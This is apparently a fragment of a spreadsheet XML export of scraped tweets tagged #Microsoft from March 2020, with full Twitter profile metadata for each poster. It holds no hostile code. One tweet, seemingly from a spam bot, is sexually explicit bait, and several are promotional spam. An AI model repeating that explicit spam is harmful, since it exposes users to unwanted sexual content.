Read more: https://t.co/Ee1XwR12th https://t.co/K6qQWsTBws</t>
  </si>
  <si>
    <t>{'id': 234678063, 'id_str': '234678063', 'name': 'Al Bawaba Business', 'screen_name': 'AlBawabaBiz', 'location': '', 'description': 'Breaking business news and in-depth coverage on the economic trends, individuals and technologies shaping the GCC and Middle East ðŸŒ', 'url': 'https://t.co/STCA4TFvy0', 'entities': {'url': {'urls': [{'url': 'https://t.co/STCA4TFvy0', 'expanded_url': 'https://www.albawaba.com/business', 'display_url': 'albawaba.com/business', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4648, 'friends_count': 213, 'listed_count': 303, 'created_at': 'Thu Jan 06 08:28:08 +0000 2011', 'favourites_count': 2056, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 28573, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '961414', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/996698477634768896/VhJalETh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/996698477634768896/VhJalETh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/234678063/1579432743', 'profile_link_color': '190C80', 'profile_sidebar_border_color': '961414', 'profile_sidebar_fill_color': 'D1D1D1', 'profile_text_color': '0D0D0D', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 09:58:14 +0000 2020</t>
  </si>
  <si>
    <t>Daily #Crypto #News from @ChicoCrypto on @tokentuber 
#Ethereum $eth Will Take Over Enterprise w/ 3 #Altcoins! Who? When? @MakerDAO $mkr @chainlink $link  @UnibrightIO $ubt @Microsoft #microsoft @AMD #amd @baselineproto #baselineprotocol @EYnews #EY 
https://t.co/QjXfASxHMJ</t>
  </si>
  <si>
    <t>{'id': 985206705674911746, 'id_str': '985206705674911746', 'name': 'Ed', 'screen_name': 'ED_1706', 'location': '', 'description': '#Bitcoin is The King of #Crypto', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 106, 'friends_count': 31, 'listed_count': 1, 'created_at': 'Sat Apr 14 17:22:37 +0000 2018', 'favourites_count': 144, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 337,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'http://pbs.twimg.com/profile_images/1036765112693080066/YsjkcZ7l_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1036765112693080066/YsjkcZ7l_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/985206705674911746/1577807405',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</si>
  <si>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09:51:15 +0000 2020</t>
  </si>
  <si>
    <t>When you are very big, you also have to be very nice!  #microsoft
https://t.co/sf9ECFrRjp</t>
  </si>
  <si>
    <t>{'id': 5386392, 'id_str': '5386392', 'name': 'Magnus MÃ¥rtensson â˜', 'screen_name': 'noopman', 'location': 'Malmo, Sweden', 'description': 'As the CEO of Loftysoft, No-Op Man is perpetually at 150%! Microsoft Regional Director (RD), Azure Most Valuable Professional (MVP).', 'url': 'http://t.co/R7C3uDlvQx', 'entities': {'url': {'urls': [{'url': 'http://t.co/R7C3uDlvQx', 'expanded_url': 'http://about.me/noopman', 'display_url': 'about.me/noopman', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3780, 'friends_count': 741, 'listed_count': 194, 'created_at': 'Sat Apr 21 21:10:55 +0000 2007', 'favourites_count': 2950, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14792,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'http://pbs.twimg.com/profile_images/1120674824311980032/egrAHGMz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1120674824311980032/egrAHGMz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/5386392/1506398421',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</si>
  <si>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09:50:45 +0000 2020</t>
  </si>
  <si>
    <t>Covid-19 will hit lower income groups harder. So proud that #Microsoft is doing this for its hourly paid workers. Appreciate that small businesses may not be able to, large employers who can should consider doing so. https://t.co/7ijgLCbKqX #MSFTAdvocate</t>
  </si>
  <si>
    <t>{'id': 15591976, 'id_str': '15591976', 'name': 'shoon', 'screen_name': 'shoon', 'location': 'Singapore', 'description': 'single mum of 4, baker, chef, diver, foodie, fur-mom, gamer, learner, photographer, traveler, empowering talent as Diversity &amp; Inclusion Sr Manager in Microsoft', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 71, 'friends_count': 35, 'listed_count': 0, 'created_at': 'Fri Jul 25 01:02:35 +0000 2008', 'favourites_count': 72, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 329,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'http://pbs.twimg.com/profile_images/697743304155201537/aCTd_NP5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/697743304155201537/aCTd_NP5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15591976/1455189748',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</si>
  <si>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09:48:20 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Arabia Launches Latest #Surface Releases to Support Businesses in KSA https://t.co/hMhBvJ9FVn via @eyeofriyadh</t>
  </si>
  <si>
    <t>{'id': 2887798870, 'id_str': '2887798870', 'name': 'Scope Technologies', 'screen_name': 'Scope_Tech', 'location': 'Riyadh, Saudi Arabia', 'description': 'Ù…ØªØ®ØµØµÙˆÙ† ÙÙŠ ØªÙˆÙÙŠØ± Ø¹Ø¯Ø¯ Ù…Ù† Ø§Ù„Ø­Ù„ÙˆÙ„ ÙˆØ§Ù„Ø®Ø¯Ù…Ø§Øª Ø§Ù„Ø§Ø­ØªØ±Ø§ÙÙŠØ© ÙÙŠ Ù…Ø¬Ø§Ù„ Ø§Ù„ØªÙƒÙ†ÙˆÙ„ÙˆØ¬ÙŠØ§ ÙˆØªÙ‚Ù†ÙŠØ© Ø§Ù„Ù…Ø¹Ù„ÙˆÙ…Ø§Øª.\nÙ†ÙØªØ®Ø± Ø¨Ø£Ø¹Ù…Ø§Ù„ ÙˆØ¥Ù†Ø¬Ø§Ø²Ø§Øª ØªÙ…Øª Ø¨Ø£ÙŠØ¯ÙŠ Ø³Ø¹ÙˆØ¯ÙŠØ© ÙˆÙ†Ø±Ø­Ø¨ Ø¨Ø§Ù„Ù…Ø¨Ø¯Ø¹ÙŠÙ† ÙˆØ§Ù„Ù…Ø¨Ø¯Ø¹Ø§Øª.', 'url': 'https://t.co/o4fMsDClAO', 'entities': {'url': {'urls': [{'url': 'https://t.co/o4fMsDClAO', 'expanded_url': 'https://scopetech.sa', 'display_url': 'scopetech.sa', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 91, 'friends_count': 354, 'listed_count': 2, 'created_at': 'Sat Nov 22 10:44:41 +0000 2014', 'favourites_count': 187, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 269,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'http://pbs.twimg.com/profile_images/1173320358549708803/SWWffysw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1173320358549708803/SWWffysw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2887798870/1569261817',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</si>
  <si>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09:48:02 +0000 2020</t>
  </si>
  <si>
    <t>Here are 10 simple reasons why you should use #SharePoint for your #intranet. Easy peasy!
https://t.co/iqlt3C1a5O 
#intranethelp #office365 #microsoft #microsoftgoldpartner #gcloud</t>
  </si>
  <si>
    <t>{'id': 2492713676, 'id_str': '2492713676', 'name': 'Business Agility', 'screen_name': 'BAgility', 'location': 'United Kingdom', 'description': "Expert in SharePoint across all verticals and in optimising business processes within the insurance industry. Oh, and we're a delight to work with too.", 'url': 'https://t.co/L2NEjjyZmV', 'entities': {'url': {'urls': [{'url': 'https://t.co/L2NEjjyZmV', 'expanded_url': 'http://www.business-agility.com', 'display_url': 'business-agility.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 315, 'friends_count': 387, 'listed_count': 22, 'created_at': 'Tue May 13 09:48:47 +0000 2014', 'favourites_count': 173, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5981,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'http://pbs.twimg.com/profile_images/880819526279077888/wMJFW8Ot_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/880819526279077888/wMJFW8Ot_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2492713676/1506079240',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</si>
  <si>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09:47:09 +0000 2020</t>
  </si>
  <si>
    <t>FREE EVENT: Codeless AI Apps in Microsoft Office 365 Powerapps
In collaboration with @CloudstreetC @ntpowerplatform 
RSVP https://t.co/ufw1yxnR16  
https://t.co/Cm3x8EVJjz 
#powerbi #microsoft #powerapps #dashboard #businessintelligence #data #dataanalytics  #microsoftpowerbi https://t.co/zq8tnv8oxa</t>
  </si>
  <si>
    <t>{'id': 923415019290746880, 'id_str': '923415019290746880', 'name': 'AI Darwin', 'screen_name': 'AI_Darwin', 'location': 'Darwin, Northern Territory', 'description': 'Nobody knows the power of artificial intelligence like AI Darwin', 'url': 'https://t.co/ZObBgI0btH', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZObBgI0btH', 'expanded_url': 'http://www.aidarwin.com.au', 'display_url': 'aidarwin.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 52, 'friends_count': 44, 'listed_count': 0, 'created_at': 'Thu Oct 26 05:04:31 +0000 2017', 'favourites_count': 216, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3313, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/923415451895414785/0uC4Tce5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/923415451895414785/0uC4Tce5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/923415019290746880/1534749808',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</si>
  <si>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09:44:18 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft will pay hourly workers regular wages even if their hours are reduced because of #COVID-19 concerns https://t.co/5WgYDdMr4s</t>
  </si>
  <si>
    <t>{'id': 2478688363, 'id_str': '2478688363', 'name': 'Gate 15', 'screen_name': 'Gate_15_Analyst', 'location': '', 'description': 'Risk Management: Info / Threat Analysis, Operations, Preparedness &amp; Critical Infrastructure Security &amp; Resilience https://t.co/vrCkP4dQVt', 'url': 'https://t.co/vrCkP4dQVt', 'entities': {'url': {'urls': [{'url': 'https://t.co/vrCkP4dQVt', 'expanded_url': 'https://gate15.global/', 'display_url': 'gate15.global', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/vrCkP4dQVt', 'expanded_url': 'https://gate15.global/', 'display_url': 'gate15.global', 'indices': [114, 137]}]}}, 'protected': False, 'followers_count': 1816, 'friends_count': 2343, 'listed_count': 1009, 'created_at': 'Mon May 05 18:01:42 +0000 2014', 'favourites_count': 4271, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 121156,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'http://pbs.twimg.com/profile_images/588039865197002753/zn9ASj0F_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/588039865197002753/zn9ASj0F_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2478688363/1426361828',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</si>
  <si>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09:41:08 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Continues to Strengthen Its #Cloud Business, infograph by @StatistaCharts 
#infograph, #cloud, #publiccloud, #aws, #cloudcomputing https://t.co/sEKa1fU2Pj</t>
  </si>
  <si>
    <t>{'id': 3415215761, 'id_str': '3415215761', 'name': 'Tim Herglotz', 'screen_name': 'Tim_Herglotz', 'location': 'KÃ¶ln, Nordrhein-Westfalen', 'description': '#Dealmaker &amp; #DigitalStrategiest | Passionate about #MegaDeals and #DigitalTransformations | #Technology | #Innovation | #Father | Views are my own', 'url': 'https://t.co/TnVnEz3UkR', 'entities': {'url': {'urls': [{'url': 'https://t.co/TnVnEz3UkR', 'expanded_url': 'http://timherglotz.com', 'display_url': 'timherglotz.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4690, 'friends_count': 2534, 'listed_count': 79, 'created_at': 'Tue Aug 11 13:10:52 +0000 2015', 'favourites_count': 15010, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1987,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'http://pbs.twimg.com/profile_images/1233120858518020096/kxBy0W2l_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233120858518020096/kxBy0W2l_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3415215761/1583331602',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</si>
  <si>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09:38:47 +0000 2020</t>
  </si>
  <si>
    <t>#Amazon, #Google, #Facebook, and #Microsoft are asking Seattle-based staff to work from home because of coronavirus</t>
  </si>
  <si>
    <t>{'id': 938318484865368064, 'id_str': '938318484865368064', 'name': 'Vinron', 'screen_name': 'Vinrontech', 'location': 'India', 'description': 'Vinron is a  technology website.We offer Quality technology news and more.Visit our website https://t.co/iV2P024KK9\nfor more info : https://t.co/1EpeDXM3UR', 'url': 'https://t.co/44ftf8Ygut', 'entities': {'url': {'urls': [{'url': 'https://t.co/44ftf8Ygut', 'expanded_url': 'http://www.vinron.in', 'display_url': 'vinron.in', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/iV2P024KK9', 'expanded_url': 'http://vinron.in', 'display_url': 'vinron.in', 'indices': [92, 115]}, {'url': 'https://t.co/1EpeDXM3UR', 'expanded_url': 'http://vinron.in/about-vinron/', 'display_url': 'vinron.in/about-vinron/', 'indices': [132, 155]}]}}, 'protected': False, 'followers_count': 43, 'friends_count': 1, 'listed_count': 0, 'created_at': 'Wed Dec 06 08:05:34 +0000 2017', 'favourites_count': 511, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1926,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'http://pbs.twimg.com/profile_images/1200237493158727680/V8aY1g61_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1200237493158727680/V8aY1g61_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/938318484865368064/1583428860',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</si>
  <si>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09:36:51 +0000 2020</t>
  </si>
  <si>
    <t>Revolution is created by community! #powerplatform #dynamics365 #powerapps #poweraddicts #powerautomate #microsoft #revolution #jointherevolution https://t.co/43ENiiNVXF</t>
  </si>
  <si>
    <t>{'id': 324812634, 'id_str': '324812634', 'name': 'Dave Burrell - Solution Architect &amp; PROBLEM SOLVER', 'screen_name': 'DaveBurrell', 'location': 'Glasgow, Scotland', 'description': 'Senior Solution Architect - Helping people achieve more.', 'url': 'https://t.co/hd2sIlWBCZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/hd2sIlWBCZ', 'expanded_url': 'http://www.daveburrell.co.uk', 'display_url': 'daveburrell.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 370, 'friends_count': 636, 'listed_count': 10, 'created_at': 'Mon Jun 27 07:44:50 +0000 2011', 'favourites_count': 762, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 946, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'A9D038', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1067915468156096518/2lHBs8gm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1067915468156096518/2lHBs8gm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/324812634/1543445934', 'profile_link_color': '7FDBB6',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</si>
  <si>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09:36:27 +0000 2020</t>
  </si>
  <si>
    <t>@SWRetroComp @RetroGamer_Mag @RetroBoyJon @AtariVision @TheAtariGamer @AmigaRetweets @amigaramapod @16bitnostalgia @Retrogear_UK @GAMETelford @ColonelFalcon #RetroTrio KEEP #Microsoft #Xbox, DONATE #Atari #Lynx2 DELETE #Commodore #Amiga #CD32. 
 #RetroComputing #ComputerHistory #RetroGaming #VideoGames</t>
  </si>
  <si>
    <t>{'id': 20051885, 'id_str': '20051885', 'name': 'alan brown', 'screen_name': 'alansbrown', 'location': 'London &amp; Wimbledon', 'description': 'Laid back chap........as life`s much to short for stress!! love travel / food / music/wine/fun and married to the most wonderful woman that is @kazveggie', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 151, 'friends_count': 327, 'listed_count': 3, 'created_at': 'Wed Feb 04 13:19:59 +0000 2009', 'favourites_count': 1766, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4887,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'http://pbs.twimg.com/profile_images/75330423/howmanymariosxx0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/75330423/howmanymariosxx0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20051885/1582581560', 'profile_link_color': '1CB0E6', 'profile_sidebar_border_color': '151F61', 'profile_sidebar_fill_color': 'FFEECC', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 09:34:43 +0000 2020</t>
  </si>
  <si>
    <t>"Five Countries and Tech firms agree groundbreaking principles to keep #children safe online"
#Australia, #Canada, #NewZealand, #UK, #USA 
Tech firms who endorsed the principles were #Facebook, #Google, #Microsoft, #Twitter, #Snap and #Roblox
https://t.co/DhG4MvcTbn @maryCyPsy https://t.co/OOEaPfaenl</t>
  </si>
  <si>
    <t>{'id': 3055290779, 'id_str': '3055290779', 'name': 'ðŸŒž â˜¾ ðŸ™ ((( CITechRPM | BlueBlood ))) â', 'screen_name': 'CITechRPM', 'location': 'United Kingdom', 'description': 'â–ˆâ–ˆ â–ˆâ–ˆâ–ˆ â–ˆâ–ˆâ–ˆâ–ˆ â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ #InfoSec #PCBuilder #Future #Technology #UK #Education #Space #Science #OldGamer\n \nAhh! ahh! ah hashtags\n\nMy Linktree https://t.co/GuKvLbsxAT', 'url': 'https://t.co/WRjZsQ9FjI', 'entities': {'url': {'urls': [{'url': 'https://t.co/WRjZsQ9FjI', 'expanded_url': 'http://blueblood.royalwebhosting.net', 'display_url': 'blueblood.royalwebhosting.net', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/GuKvLbsxAT', 'expanded_url': 'http://linktr.ee/citechrpm', 'display_url': 'linktr.ee/citechrpm', 'indices': [139, 162]}]}}, 'protected': False, 'followers_count': 1775, 'friends_count': 4999, 'listed_count': 321, 'created_at': 'Mon Feb 23 09:20:50 +0000 2015', 'favourites_count': 897, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9593, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'C40E2D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1213537450158632961/NXfDEevT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1213537450158632961/NXfDEevT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3055290779/1583093280', 'profile_link_color': '2E5090',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</si>
  <si>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09:32:53 +0000 2020</t>
  </si>
  <si>
    <t>I do not like the new #Microsoft #MicrosoftEdge</t>
  </si>
  <si>
    <t>{'id': 1146207330956128257, 'id_str': '1146207330956128257', 'name': 'DanDB', 'screen_name': 'DanDBisdabest', 'location': 'Milton Keynes, England', 'description': "I don't like you and you don't like me... fair enough", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 30, 'listed_count': 0, 'created_at': 'Wed Jul 03 00:01:38 +0000 2019', 'favourites_count': 124, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1146212234898694146/QxPI21CV_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1146212234898694146/QxPI21CV_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1146207330956128257/1562114194',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</si>
  <si>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09:30:00 +0000 2020</t>
  </si>
  <si>
    <t>. @TexasChildrens' John Hamm explains how their partnership with @HPE and use of #AI has enabled their #radiology department to create a better care path in complex cases.
#HPEalliances #Microsoft #ArtificialIIntelligence #HybridCloud #AI #Healthcare #HIMMS20 https://t.co/9JHHAcju8g</t>
  </si>
  <si>
    <t>{'id': 3937914677, 'id_str': '3937914677', 'name': 'TechNative', 'screen_name': 'TechNative', 'location': 'Earth', 'description': 'Technology at Work â€¢ #EnterpriseIT â€¢ #AI â€¢ #BigData â€¢ #IoT â€¢ #IIoT #InfoSec â€¢ Videos: #TechNativeTV â€¢ LinkedIn: https://t.co/M28Hx1soMh', 'url': 'https://t.co/uOIdDajS6S', 'entities': {'url': {'urls': [{'url': 'https://t.co/uOIdDajS6S', 'expanded_url': 'http://technative.io', 'display_url': 'technative.io', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/M28Hx1soMh', 'expanded_url': 'https://www.linkedin.com/company/technative', 'display_url': 'linkedin.com/company/technaâ€¦', 'indices': [112, 135]}]}}, 'protected': False, 'followers_count': 84269, 'friends_count': 66035, 'listed_count': 2725, 'created_at': 'Mon Oct 12 14:42:00 +0000 2015', 'favourites_count': 4869, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 62266, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '212349', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/877265193818103808/uriy-gaK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/877265193818103808/uriy-gaK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3937914677/1526603737',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</si>
  <si>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09:25:52 +0000 2020</t>
  </si>
  <si>
    <t>Retweet if you want to cum on my face  #Kentucky   #microsoft #pictures https://t.co/SEw9yVQAQ6</t>
  </si>
  <si>
    <t>{'id': 1235635429669560321, 'id_str': '1235635429669560321', 'name': 'Jessica Reed', 'screen_name': 'spyrirrade', 'location': 'Fargo, USA', 'description': 'Every time I see you, I fall in love all over again.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 26, 'listed_count': 0, 'created_at': 'Thu Mar 05 18:37:04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'http://pbs.twimg.com/profile_images/1235655328353726464/ZDdx97SX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235655328353726464/ZDdx97SX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235635429669560321/1583438199',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</si>
  <si>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09:25:48 +0000 2020</t>
  </si>
  <si>
    <t>Just discovered Microsoft Planner AND the fact it integrates with Microsoft To Do! #MicrosoftPlanner #office365 #Microsoft #MicrosoftTeams</t>
  </si>
  <si>
    <t>{'id': 1149211410427260928, 'id_str': '1149211410427260928', 'name': 'Daniel McLoughlin', 'screen_name': 'CloudDevDan', 'location': 'England, United Kingdom', 'description': 'Azure Systems Developer, Serverless advocate and coffee snob.  All opinions are my own.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 173, 'friends_count': 579, 'listed_count': 2, 'created_at': 'Thu Jul 11 06:58:46 +0000 2019', 'favourites_count': 362, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 225,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'http://pbs.twimg.com/profile_images/1218089908478320641/WFnXWEe4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218089908478320641/WFnXWEe4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1149211410427260928/1571126433', 'profile_link_color': 'CCCCCC',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</si>
  <si>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09:25:22 +0000 2020</t>
  </si>
  <si>
    <t>Completed MS Azure Fundamentals exam earlier today. Thanks to @Azure account team and @SAP  multi-cloud for the support. Was impressed by @MicrosoftLearn and the quality of the public docu. https://t.co/k2YUOdpygn
#Microsoft #Azure #AzureCloud #microsoftazure #microsoftcertified</t>
  </si>
  <si>
    <t>{'id': 179109998, 'id_str': '179109998', 'name': 'Pavel Pavlov', 'screen_name': 'PavelnPavlov', 'location': 'Germany', 'description': '', 'url': 'https://t.co/P2zdRda0J9', 'entities': {'url': {'urls': [{'url': 'https://t.co/P2zdRda0J9', 'expanded_url': 'https://www.pavel-pavlov.com/', 'display_url': 'pavel-pavlov.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 126, 'friends_count': 273, 'listed_count': 7, 'created_at': 'Mon Aug 16 14:48:22 +0000 2010', 'favourites_count': 143, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 216,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'http://pbs.twimg.com/profile_images/1181813559866597382/dVg7fzox_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1181813559866597382/dVg7fzox_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/179109998/1511805198',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</si>
  <si>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09:25:14 +0000 2020</t>
  </si>
  <si>
    <t>'Quantum computers will change the world (if they work)' by @amitkatwala for @WIRED 
https://t.co/jLcgquZdiF
#QuantumComputing #Qubit #IBM #Microsoft #Google #technology #tech</t>
  </si>
  <si>
    <t>{'id': 1049953864642891776, 'id_str': '1049953864642891776', 'name': 'Can Factory', 'screen_name': 'can_factory', 'location': 'London, England', 'description': 'Can Factory is a London software development company known for building high-profile, high-traffic eCommerce and Content Management solutions for clients.', 'url': 'https://t.co/SBBI7sqeCC', 'entities': {'url': {'urls': [{'url': 'https://t.co/SBBI7sqeCC', 'expanded_url': 'https://www.canfactory.com', 'display_url': 'canfactory.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 86, 'listed_count': 0, 'created_at': 'Wed Oct 10 09:24:43 +0000 2018', 'favourites_count': 240, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 310, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1082646189558902784/oxZAXW4K_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1082646189558902784/oxZAXW4K_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1049953864642891776/1539257265',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</si>
  <si>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09:23:40 +0000 2020</t>
  </si>
  <si>
    <t>Cortana might get a new name , Microsoft  is planning to rebrand  it
#cortana #Microsoft #microsftsurface #surface #office365 #office 
https://t.co/GKDlMHGJJg</t>
  </si>
  <si>
    <t>{'id': 71820704, 'id_str': '71820704', 'name': 'themartisboy', 'screen_name': 'themartisboy', 'location': 'ÃœT: 12.9791283,77.6548254', 'description': 'Microsoft and Liverpool fanboy  Huge passion towards  marketing and analytics, Technology freak and proud biker', 'url': 'https://t.co/NRmwf3wlvO', 'entities': {'url': {'urls': [{'url': 'https://t.co/NRmwf3wlvO', 'expanded_url': 'http://www.nerdytechnos.com', 'display_url': 'nerdytechnos.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 182, 'friends_count': 1122, 'listed_count': 10, 'created_at': 'Sat Sep 05 15:09:53 +0000 2009', 'favourites_count': 671, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1748,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'http://pbs.twimg.com/profile_images/1171117337069654016/29yY0EMH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1171117337069654016/29yY0EMH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/71820704/1476203236', 'profile_link_color': '1B95E0',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</si>
  <si>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Fri Mar 06 09:23:24 +0000 2020</t>
  </si>
  <si>
    <t>#Register at https://t.co/046Lp2UFoi and you can also #upload your own #document #templates set a fee and #earn a #commission from each download - The #online #Marketplace for all your document needs
#Microsoft #earnmoney #Online #free #video #easy #Simple #passive #income #extra https://t.co/hLaWybbgsI</t>
  </si>
  <si>
